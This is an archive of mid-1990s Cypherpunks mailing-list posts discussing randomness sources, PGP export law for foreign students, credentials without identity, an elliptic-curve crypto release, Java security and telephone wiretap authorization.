Subject: Re: on topic!!
Message-ID: <199511050039.QAA02014@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 PM 11/4/95 -0800, VZNuri wrote:
>if there were two key elements here, these conversations would probably
>largely go away (instead of continually reappear)
>- an unambiguous charter
>- an active moderator
>
>unfortunately I suspect that a moderator does exist but he "prefers
>to remain anonymous" ("pseudonymous"?). imho that is precisely 
>how *not* to succeed as a moderator.

As an alternative, there was the Cypherwonks list, which worked just that
way, and such conversations did rapidly go away :-)
What's evolved here instead are a couple of filtered lists,
such as cp-lite, where you can get the conversations that
one or another monitor considers relevant instead of the whole firehose.
It seems to work reasonably well for a lot of people.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 5 Nov 1995 09:10:47 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951104163531.19656J-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Bill Stewart wrote:

> Most of the designs I've seen look like this:
>         A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
>         An input stream I = I1....Ik, which is mixed into R
>         A mixing function F which is used to mix R <= F(R,I) 
>                 for some chunk of I, possibly empty.
>         A hash function H, typically MD5.
>         An output O = O1...Om = H(R), and E gets mixed after every output.
>                 (These are capital-o, not zero...)

I believe PGP uses this approach.  An implementation of it can also be
found in Crypto++ as randpool.cpp. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sun, 5 Nov 1995 06:18:25 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID: <Pine.SUN.3.91.951104170057.2588C-100000@fourier>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Sat, 4 Nov 1995, Derek Atkins wrote:

> It is still illegal for them to export it, however any foreign
> national can walk up to any computer store and by anything they wish,
> and take it on the plane with them.  Therefore, in an institution of
> higher learning, the same standards should be allowed.  If the
> government does not want your student to have access to possibly
> "dangerous" information, then they should not be allowed into the
> country at all.
> 
> Therefore, I say just make PGP available to your students.

  I'm trying, but all the legal angles need to be covered first.  This 
answer helped a great deal though.  Just remember, I am just an undergrad 
student. :)
  Thanx.

James Black





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 09:12:18 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <acc13d911f021004b09f@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951104165650.6970E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> Therefore, there are few ways that citizenship can be "checked." Period. A
> foreigner who wishes to "prove" his non-U.S. status could, of course, show
> his green card. But this is different from proving citizenship.
> 

And here we have the rub. People with permanent residency (i.e. green 
cards) are fully entitled to access to strong crypto. Most foreign 
students are on J-1 visas, which do not grant permanent residency. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 09:16:43 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: [ID point semi-off-topic] Re: using PGP only for digital signatures
In-Reply-To: <acc13d911f021004b09f@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951104163117.6549M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> Pop Quiz: If you are a citizen of the U.S., prove it.
>...
> As has been said several times recently, for the purposes of law, non-U.S.
> citizens who reside in the U.S are effectively "U.S. persons." Subject to
> U.S. law and generally having the same legal rights. (Can't vote. Can be
> drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not
> discriminate against the differently clued, etc.)

All true.

> Consider this: most people in the U.S. do not have a "credential" that
> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> passports.) They have driver's licenses, which say nothing about
> citizenship (at least California and Virgina licenses do not). Social
> Security cards are the same.
> 
> (Second hint: most people are hard-pressed to locate a birth certificate
> for themselves. Many people take the easy way out and simply buy a new one
> for the $25 a good one costs.)
> 
> Therefore, there are few ways that citizenship can be "checked." Period. A
> foreigner who wishes to "prove" his non-U.S. status could, of course, show
> his green card. But this is different from proving citizenship.

A green card, by itself, also fails to prove legal status.

Proving legal residency requires a combination of two documents, one each
from specified lists. Most commonly a driver's license, green card (which
is actually pink), or birth certificate from list A, and a social
security card from list B. 

Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
it's a Good Thing. Basically, for privacy and security reasons, it is a
very good idea to separate the issues of identity and authorization.

I don't care how securely you can authenticate who I am -- by PGP, retinal
scan, whatever. I do not want a single digitizable token to be the key to
my identity. Even if that identity cannot be forged (and everything can be
forged), it can be used to track me, by the government, by the Direct
Marketing Association, by the private investigators of certain wacky
cults, and by TRW. And I suppose by those secret government types at SAIC
who, we are told, control the Internet now :-)

It is a little inconvenient, but this is why it's a Good Thing that you
need a separate driver's license, social security card, credit card, phone
number, PGP key, password, thumbprint, and retina. I would oppose moves to
combine them to a single unified "mark of the beast," as it were. I am a
little uneasy about the otherwise very cool First Bank of the Internet for
this reason. If you use FBOI, I'd recommend using a PGP key separate from 
your usual PGP key.

Crypto fans need to recognize that the ability to securely prove your 
identity is not an unmitigated advance.

Of course, all the crypto fans here are also pseudonym fans.

> As to the point about students impersonating faculty, if the faculty starts
> signing their messages (doubtful), then no one can impersonate _them_.
> (Except that it sounds like all this PGP stuff is to happen on campus
> computers, in which case there are several ways their private keys and
> passphrases can be snarfed.) The issue of a "credential" for faculty
> members, something that says "This person is a member of the Foo U.
> faculty," well, this is a different kettle of fish; such credentials are
> not part of the PGP system, though webs of trust could in principle be used
> in a klugey kind of way.

This is a job for private key cryptography, like kerberos.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@mcs.net>
Date: Sun, 5 Nov 1995 07:21:11 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Version 2 Elliptic Curve Crypto
Message-ID: <Pine.BSI.3.91.951104165609.18788B-100000@Venus.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


Howdy,

	I blew it the first time, but the correct elliptic.2.tar now sits 
on ftp.csua.berkeley.edu/pub/cypherpunks/ciphers.  This version is twice 
as fast as eliptic.tar.  A newer version of the elliptic.2.doc is being
fixed right now, the only difference with what is posted is a correct 
reference to the CRYPTO '95 article on polynomial basis inversion.  Enjoy.

	For a compiled version on Sun or under Borland C++ contact Steve 
Albrecht (eh@mcs.com).  He is in the process of setting up macros to get 
this to compile under just about any unix system.  He's also fixed quite 
a few bugs and is cleaning up a bunch of uninitialized data structures 
that I didn't notice.  Last I heard it was working, so if you want to 
play on a specific platform, contact Steve directly.

	Hilarie Orman from U. Arizona (one of the authors of the CRYPTO 
'95 paper) thinks that calling elliptic curves "strong crypto" may be 
over selling it.  I'm not enough of a mathematician to know how to argue, 
but it seems to me that almost perfect random output is about as close to 
strong crypto as one could get.  Security thru obscurity doesn't work, 
elliptic curves are obscure and so far not studied to the same extent as 
RSA or DES.  However, I'll make the claim that elliptic curves are 
"strong crypto" until proven otherwise.

	Along those lines, does any one have a classic text to encrypt 
for a plaintext/ciphertext challenge?  I'll put something together and 
post it in the next few weeks.  I'll use the symmetric encryption 
subroutine.  If there is any interest, should I put out a public key 
challenge as well?  Note, I ain't rich, so only token prizes (like $50 
ecash and $50 real for each challenge).  The point is to check if this is 
credable crypto, that's all.

	E-mail replies to cryptech@mcs.com.  Thanks for reading this!

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mhkohne@discordia.org (Michael Kohne)
Date: Sun, 5 Nov 1995 06:43:57 +0800
To: cypherpunks@toad.com
Subject: Re: consumer products that make nice sources
Message-ID: <v02120d00acc195427273@[205.164.159.32]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:34 PM 11/3/95, Timothy C. May wrote:
>At 5:46 PM 11/3/95, Brad Dolan wrote:
>
>>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred

>>I think the following is the right phone number.
>>
>>Sunshine Mine is an amusing concept.  People pay money to go breathe radon
>>there, while others are spending much money avoiding radon.
>>
>>Anyway, the pillows make nice sources and good conversation pieces.
>
>I'd say they make poor sources. Far too large. A smaller source has better
>access to the detector without adding much to the overall background the
>user is exposed to. (I'm not saying low-level uranium or thorium sources
>are much of a hazard, but the fluence presented at the detector is very low
>for such an extended source.)

If it's a cheap source of higher-than-background radiation, try a smoke
detector. They are getting darn cheap these days, and my First Alert Model
83R says it contains 1.0 Microcurie of Americium 241. This should raise the
count rate significantly over background. And if one isn't enough, you could
always get several, remove the module with the radioactive materials in it
(it's a sort of black cylinder in mine) from several, and put them all in a
box with the radiation detector. As I remember, I bought 2 or three of these
detectors in a single package for about $15 3 years ago. They should be
quite cheap by now.

Although, I don't think it has the same sort of humor value as the pillow.
(What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJvmh4P3Pba7OSlRAQEDlwP8Cm4vryVejfJZoSd/amwFLxJZWYnPHNxS
3KCmw8jSKjFk4iF+wTvWAHbFIjjkKFGBLt6+BMbDt2eUM6R87mNay1nMASsCoweL
syDr4D39XDUGF6sw7TDulLTW62u7JKaCIGoBQU5+uU4Qxs3YA4QVVR+sLi885ngt
o0GEIeVgLw8=
=hNXr
-----END PGP SIGNATURE-----

----
Michael Kohne                  mhkohne@discordia.org or mhkohne@moberg.com
"Quantum mechanics is your friend"
Key fingerprint =  EE 22 9D 9B 32 5E F1 37  D2 B3 DC 78 19 24 D1 E8






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 08:19:07 +0800
To: cypherpunks@toad.com
Subject: Re: using PGP only for digital signatures
Message-ID: <acc13d911f021004b09f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Pop Quiz: If you are a citizen of the U.S., prove it.


At 11:33 PM 11/4/95, Simon Spero wrote:
>On Sat, 4 Nov 1995, Derek Atkins wrote:
>
>> student from coming to the US.  By allowing the student into the US,
>> the gov't is implicitly giving them the right to use PGP within the
>> US.
>
>This is kind of a risky policy to take. The general feeling I get that
>allowing non green-card holders access to strong cryptography is sort of
>decriminalised, in that the police aren't likely to break down your door
>and have your AFS server accidentaly fall down stairs. However, it is
>still against the law, and could be used against the university in other
>unrelated circumstances.
>
>It seems that licences allowing foreign nationals access to cryptographic
>software within the US are pretty easy to get, and especially for
>something like PGP on a central machine.

We really need to put this one to bed.

As has been said several times recently, for the purposes of law, non-U.S.
citizens who reside in the U.S are effectively "U.S. persons." Subject to
U.S. law and generally having the same legal rights. (Can't vote. Can be
drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not
discriminate against the differently clued, etc.)

All of the nonsense about wearing a "munitions shirt" in front of a
"foreigner" seems to miss this essential point.

Ditto for PGP use.

Consider this: most people in the U.S. do not have a "credential" that
shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
passports.) They have driver's licenses, which say nothing about
citizenship (at least California and Virgina licenses do not). Social
Security cards are the same.

(Second hint: most people are hard-pressed to locate a birth certificate
for themselves. Many people take the easy way out and simply buy a new one
for the $25 a good one costs.)

Therefore, there are few ways that citizenship can be "checked." Period. A
foreigner who wishes to "prove" his non-U.S. status could, of course, show
his green card. But this is different from proving citizenship.

As to the USF--or was it SFSU?--student worried about "allowing" PGP to be
used...I despair at this outlook. Why not simply ignore the issue, not
"give" them PGP, but instead have a few pointers to where PGP may be
gotten.

As to the point about students impersonating faculty, if the faculty starts
signing their messages (doubtful), then no one can impersonate _them_.
(Except that it sounds like all this PGP stuff is to happen on campus
computers, in which case there are several ways their private keys and
passphrases can be snarfed.) The issue of a "credential" for faculty
members, something that says "This person is a member of the Foo U.
faculty," well, this is a different kettle of fish; such credentials are
not part of the PGP system, though webs of trust could in principle be used
in a klugey kind of way.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 08:22:23 +0800
To: cypherpunks@toad.com
Subject: Re: Video as a source of randomness
Message-ID: <acc141f120021004b7ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 11/4/95, Bill Stewart wrote:

>Pointing the camera at a snowy TV or out the window or at a cat playing
>with catnip can generate much more randomness if you need it.

Which would make that "dev/cat," right?


--Klaus!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Nov 1995 10:12:55 +0800
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <199511050203.SAA01370@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Todd Glassey <todd@lgt.com> writes:

> Pardon the flame but I really have just about heard enough of this BS...

No one needs to listen to anything if they don't want to, Todd, but I 
think that some things need saying none the less.

I think the old saying is: You can lead a horse to water, but you can't 
make him think, or something like that ...

>>This response came from Sun to Risks:
>>
>>> Date: Mon, 16 Oct 1995 21:22:40 -0700
>>> From: Caveh.Jalali@eng.sun.com (Caveh Jalali)
>>> Subject: Re: Risks in Java
>>>
>>> If we are going to "analyze" java security, let's keep in mind that
>>> there is an important distinction between the language (java) and the
>>> machinery which runs the java program. 

Hmm, this is a very interesting prespective, coming from Sun Engineering
as it were. The company that says that the Network is the machine, or
somesuch.  I always thought that security consisted of everything: 
hardware, software, and wetware. 

(Or it did the last time, I checked my handbook.)

Admittedly this is a horrible inconvenience, especially when it comes to
security. 

>>> Java is a general-purpose programming language along the lines of C/C++.
>>> So, there is no doubt that its expressive power overwhelms our 
>>> theoretician's abilities to predict java-programs behavior -- this is 
>>> where we start getting into the halting problem, computability and other 
>>> black magic.  Basically, i don't think we can "trust" programs 
>>> written in any *useful* programming language.
>>
>>Read: We can't trust Java programs.

This may well be true.  But sloppy design, design which ignores the most 
basic difficulties cannot be brushed away by simply saying that "it 
exceeds theoretician's predictive abilitiies."

That simply doesn't cut it.

"Ignoring the obvious" is simply that.  It's a planned process of
"ignoring the obvious". 

One example of this that should serve as a useful case study is a recent
problem which was brought to the Canadian public's attention just this
week, on a program called the Fifth Estate.  The CBC (Canadian
Broadcasting Corporation) detailed a software code problem in one of
AECL's (Atomic Energy of Canada Limited's) instruments which deliver
penetrating radiation. 

The software which controlled the radiation dose, would periodically
override the oncologist's calibration and deliver a radiation dose 100
times what was prescribed.  This software "bug" literally killed wherever
the machine was in use. 

A simple hardware solution engineered into the product as part of a
redundancy check program would not only have saved many lives, but could
have confirmed that there were serious code deficencies.  A redundancy
program which AECL did NOT have. 

Then again AECL did not consider that it had to mathematically prove it's 
code either.  So I guess, they "ignored the obvious" not once, but twice.

A simple lesson can be learned here, one which I believe is applicable to
Java. 

If your parameters are going to be that you cannot trust your production
code, then you MUST engineer on that basis, that the production will not
be trustworthy, rather than simply crying like Chicken Little, that
mission critical applications must simply "live with" engineered
inferiority. 

Or alternatively, another lesson could be pulled out:  To avoid this 
problem, ensure that your code is mathematically provable or utilize 
appropriate hardware overrides.

Case study, #2:  Netscape.

During their code design, they assumed that all servers on a network were
trustworthy and would continue to be trustworthy.  They designed their
product on that basis.  In fact, over time the very opposite will be true. 

As an exploitation algorithm propogates, the significant percentage of
servers which are NOT trustworthy will begin to grow exponentially. 

The true assumption which Netscape should have started with is a simple 
one, and is the only assumption that ANY production house can start 
with:  that the network has a reliable transport mechanism, one which will 
route around damage.  That's it.  Any other assumptions are poor design 
and engineering and are demonstrative of a misunderstanding of the 
environmental conditions in which the engineered product is expected to 
perform.

>Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava. Are
>you unaware that the HotJava Platform is the first generation pass at an
>inline extensible GUI harness. Underline the total concept "extensible GUI
>harness". This includes a series of tool functions to *help* perform secure
>messeging (like those supplied iun Netscape 2.0/Java.), but because of the
>enormity of the task and the number of facets on the face of this gem it
>will be some time before the final versions of the first generation will be
>available.

I can't speak for "Dr. Fred", but I always worry when people start to
refer to something as a "gem", and start talking about the "enormity of
the task".  Especially if an engineer starts talking in such lyrical,
flowery prose.

Enormous tasks always lead to complexity which can never be solved by
simple linear thinking.  And the engineer from Sun is right, that it will
be some time before first generation products are available.  

(This will certainly be the case if "mathematical proofs" become mandatory
as part of an ACT in Action plan.  )

>No one else had been working on this piece of technology before SMCC
>started their effort. From the word floating about the SMCC labs they
>didn't even know what they had.
>
>So rather than slamming them, SMCC, or their PR folks for

Well, I'd rather that marketers stick to marketing AFTER a product 
development cycle is completed.  Generally, you would think (hopefully) 
that people who are technologists, just *might* have a better knowledge 
of what they have, (or don't have) wouldn't you?

Maybe??  Or maybe not ...

After all you wouldn't want some kid, some little snotty brat, some kid
who started playing around well over a decade ago -- when he was in his
teens -- as a projadmin on one of Honeywell's Multiplexed Information and
Computing Service beasts showing you up for your temerity?  

Or would you cry about the "kid" slamming you? 

>I hope that you understand my point?. The net/net is that OLTP needs to be
>scaleable to be a saleable commodity and without the ability to do
>"java-ish" like local applets... There is no clean way to do this,

Well if we're gonna bottom line it, and talk turkey, and leave Chicken
Little back at the table, skewered as it were, I'll extend a helping hand. 

The net/net is really, really simple, a product that doesn't perform as
advertised is not a saleable commodity.  No one buys cars which don't
start or cans that leak.  Sure you can have a body by Pininfarina or one
by Alcan but if the engineering isn't there under that beautiful skin then
you don't have ANYTHING TO OFFER FOR VALUE. 

>As an aside - What blows my mind is the number of cycles people spend
>bitching and moaning about Java itself rather than working to create a
>better solution.

Well. It's just not my responsibility to create a solution.  And I have a
tendancy not to "bitch and moan".  I might be one sarcastic castrating
SOB, but bitchy and moany is not something I'm routinely accused of. 

I simply have a reputation for a degree of frankness.  Nothing personal is
meant by it.  I'm actually a very nice person. 

Truly.;-I

>I just want to say "Get a clue. Moan about something that is important and
>pertinent to the technologies at hand".
>
>
>These comments are my own -

Appreciated.  And I mean that with sincerity that your comments are
appreciated.  I understand that each person here DOES express their
individual opinions.  Sometimes some very strong opinions.  Myself
included. 

Generally, wallflowers will not find comfort on this list.  We'll 
recommend that those people should stick to writing browser programs.

Oops, scratch that last thought ...

>Sincereley,
>Todd Glassey
>todd@lgt.com


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 10:51:28 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951104181249.6549N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics, Rich unfortunately labeled
> his post "[ID point semi-off-topic]..." In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

Thanks for the newbie correction.

In case anyone else is new to this, I couldn't find that paper, but Chaum's
ideas and references are at http://www.digicash.com/publish/sciam.html

> >Proving legal residency requires a combination of two documents, one each
> >from specified lists. Most commonly a driver's license, green card (which
> >is actually pink), or birth certificate from list A, and a social
> >security card from list B.
> >
> >Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
> >it's a Good Thing. Basically, for privacy and security reasons, it is a
> >very good idea to separate the issues of identity and authorization.
> >
> >I don't care how securely you can authenticate who I am -- by PGP, retinal
> >scan, whatever. I do not want a single digitizable token to be the key to
> >my identity. Even if that identity cannot be forged (and everything can be
> >forged), it can be used to track me, by the government, by the Direct
> >Marketing Association, by the private investigators of certain wacky
> ....
> 
> Rich's (or Chris') points are admirable, but getting more and more
> irrelevant by the day. The notion of unlinking identity and authorization
> by separate pieces of identification is another form of "security through
> obscurity."

True. But until digital technology becomes ubiquitous, we're stuck with
it, and it does help. I see no analog, well, analog to credential 
technology. It absolutely requires machines that can generate and handle 
large random numbers. Right?

My point was, even people who should know better, like the managers and
clients of FBOI (fboi@netcom.com), are relying on security through appeal
to irrelevant crypto authority, which is even worse. Using your primary
pgp key as a traceable link to your credit card number or bank account can
be just as bad as publishing your credit card number. 
 
> Happily, Chaum's work on "credentials without identity," based essentially
> on the kind of "blinding" used in digital cash (with some differences, of
> course), allows for one to display a credential showing one is old enough
> to enter a bar or library (in 2005), without revealing a name (which is
> just another credential).

I haven't yet fully digested this concept, but don't you get into a bit of
a chicken-and-egg problem when you start applying this to things like
proof of age and citizenship? Until you reach a certain age, you're not
going to remember your passphrase. I still think there's a role for
private keys held by some authority (I realize that's not a popular word). 

I'd guess this would be addressed by a "secret sharer"/secsplit kind of
thing, where your parents hold a combination of keys that together can
represent your secret key until you're old enough to change it yourself. 
Still I'd worry about what kind of information was gathered about me in my
youth, and how that might be carried over into maturity. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 09:40:28 +0800
To: cypherpunks@toad.com
Subject: To Repeat: Credentials Not Considered Necessary
Message-ID: <acc151232102100449bf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:03 AM 11/5/95, Simon Spero wrote:
>On Sat, 4 Nov 1995, Timothy C. May wrote:
>
>> Therefore, there are few ways that citizenship can be "checked." Period. A
>> foreigner who wishes to "prove" his non-U.S. status could, of course, show
>> his green card. But this is different from proving citizenship.
>>
>
>And here we have the rub. People with permanent residency (i.e. green
>cards) are fully entitled to access to strong crypto. Most foreign
>students are on J-1 visas, which do not grant permanent residency.

Irrelevant.

J-1 persons are still accorded the basic rights of citizens, save for a few
things like voting, holding certain offices, and perhaps jury duty (not
sure about this, as my recent jury summons was apparently based on my
Calif. Driver's License and required no form of identification whatsoever).

My basic point was that "J-1," "permanent resident," "citizen,"
"undocumented," and "completely and totally without proper papers" are, for
the purposes being discussed here, all essentially identical. Any sysadmin
who expects to have papers proving "citizenship" or any other status will
have a tough time.

Saying "People with permanent residency (i.e. green cards) are fully
entitled to access to strong crypto." and--presumably--implying that J-1
visa holders are _not_ entitled to use strong crypto within the U.S. (or,
for that matter, in their own countries, but this is another issue), is
misleading.

The laws about "showing a foreign national" certain items do not
differentiate, so far as I have seen, between various kinds of visas.

In any case, sysadmins generally do not ask for any kind of ID or proof of
citizenship, morality, residency, etc.

(On my many computer accounts over the years, as but one example, _never_
have I have been asked for credentials of any kind. Never. Not even a
driver's license, let alone a passport or birth certificate or whatever. My
current Internet Service Providers, netcom.com and got.net, are blithely
uncaring about the fact that I am technically a citizen of Ruritania, and
am not in the U.S. legally.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 11:00:35 +0800
Subject: Re: [NOISE] Re: 800_ape [FUQ Win95 List]
In-Reply-To: <Pine.3.89.9511041332.B29112-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.ULT.3.91.951104184257.6549O-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 4 Nov 1995, Rich Graves wrote:
> 
> > I'm putting together a "Windows 95 Frequently Unanswered Questions File."

This little P.S. attracted a lot of attention in private email. FYI, it's
now available at:

gopher://quixote.stanford.edu:70/0R1400265-1416663-/win95netbugs

and in the newsgroups. It's short. Several points are of interest, if not
direct relevance. Point D.8., apparent bugs in handling of longints, if 
confirmed, could have beaucoup crypto relevance.

For the record, I hadn't noticed the acronym, but I like it. A lot.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 09:53:11 +0800
To: cypherpunks@toad.com
Subject: Credentials Without Identity
Message-ID: <acc154b62202100420bc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves makes some very good points, but he said something I want to
riff on.

(And as a measure of how apologetic some folks are getting about discussing
anything not on Perry's List of Approved Topics, Rich unfortunately labeled
his post "[ID point semi-off-topic]..." In fact, the issue of credentials
and identity is NOT off-topic, not even semi-off-topic. It is central to
the themes of our list. I urge all to read Chaum's seminal work on
"credentials without identity.")

At 1:05 AM 11/5/95, Rich Graves wrote:

>Proving legal residency requires a combination of two documents, one each
>from specified lists. Most commonly a driver's license, green card (which
>is actually pink), or birth certificate from list A, and a social
>security card from list B.
>
>Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
>it's a Good Thing. Basically, for privacy and security reasons, it is a
>very good idea to separate the issues of identity and authorization.
>
>I don't care how securely you can authenticate who I am -- by PGP, retinal
>scan, whatever. I do not want a single digitizable token to be the key to
>my identity. Even if that identity cannot be forged (and everything can be
>forged), it can be used to track me, by the government, by the Direct
>Marketing Association, by the private investigators of certain wacky
....

Chris's (or Chris') points are admirable, but getting more and more
irrelevant by the day. The notion of unlinking identity and authorization
by separate pieces of identification is another form of "security through
obscurity."

The two forms of credentials can be linked in data bases. Just because one
piece of ID has citizenship or voting status and another has other stuff is
meaningless, provided the ID forms can be linked. As they can, in multiple
ways.

The credit tracking agencies can do this trivially, with names, social
security numbers, driver's license numbers, addresses, phone numbers, etc.
All are pointers into the cloud of numbers that constitutes one's dossier.

Happily, Chaum's work on "credentials without identity," based essentially
on the kind of "blinding" used in digital cash (with some differences, of
course), allows for one to display a credential showing one is old enough
to enter a bar or library (in 2005), without revealing a name (which is
just another credential).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hilarie Orman <ho@cs.arizona.edu>
Date: Sun, 5 Nov 1995 10:35:39 +0800
To: bsimpson@morningstar.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1973.bsimpson@morningstar.com>
Message-ID: <9511050229.AA00198@uncial.CS.Arizona.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>  Recently, someone asked for a smaller prime of only 512-bits for speed.
>  This is more than enough for the strength of keys needed for DES, 3DES,
>  MD5 and SHA.  Perhaps this would be easier to have more complete and
>  robust verification as well.

Depending on what you think of the strength of those algorithms, the 512-bit
mod p system may not be strong enough.

The *strength* of 512-bit mod p DH systems is only about 56 bits.  You need
1024-bit primes for a *strength* of 80 bits.

In contrast, the 155-bit elliptic curve in the Photuris draft has a
strength of about 76 bits.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 5 Nov 1995 11:34:56 +0800
To: llurch@networking.stanford.edu
Subject: Re: Telephone switch capacity -Reply
Message-ID: <v02120d02acc1d4859dfc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:43 11/3/95, Rich Graves wrote:
>[about the FBI supposedly wanting the ability to tap 1% of all phones in
>the US simultaneously]

[...]
>Of course the FBI doesn't have the staff to listen to all these lines, and
>they need an individual court order to authorize each individual
>interception, so this numbers game is a bit of a joke.

One more time. Despite what you read in the papers, despite what most
people - even in the legal profession - believe, telephone wiretaps do
_not_ require a court order. They haven't required a court order in over a
year. The Digital Telephony Bill, which passed Congress by an overwhelming
margin, _explicitly_ allows for wiretap authorizations other than a court
order. The law does not impose any rules for these "other forms of
authorization".

"The captain signed it off" may suffice.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 5 Nov 1995 08:56:59 +0800
To: Cypherpunks <ses@tipper.oit.unc.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SOL.3.91.951104151622.6970B-100000@chivalry>
